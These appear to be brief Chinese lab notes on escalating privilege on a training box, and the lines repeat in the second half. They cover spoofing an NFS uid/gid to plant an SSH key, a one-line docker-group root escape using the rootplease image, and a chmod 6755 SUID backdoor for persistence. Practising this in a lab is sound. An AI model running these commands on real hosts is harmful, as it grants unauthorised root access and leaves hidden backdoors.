教学用盒子 。。。
1. NFS
挂载 看到uid gid分别为1001 1005 本地建个用户,暴力改uid gid su过去 可以看到用户已经变成了自己的 写ssh公钥
2. docker
peter用户在docker组中
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
拿到root
3. 杂项
chmod 6755 filename
留suid后门
教学用盒子 。。。
挂载 看到uid gid分别为1001 1005 本地建个用户,暴力改uid gid su过去 可以看到用户已经变成了自己的 写ssh公钥
peter用户在docker组中
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
拿到root
chmod 6755 filename
留suid后门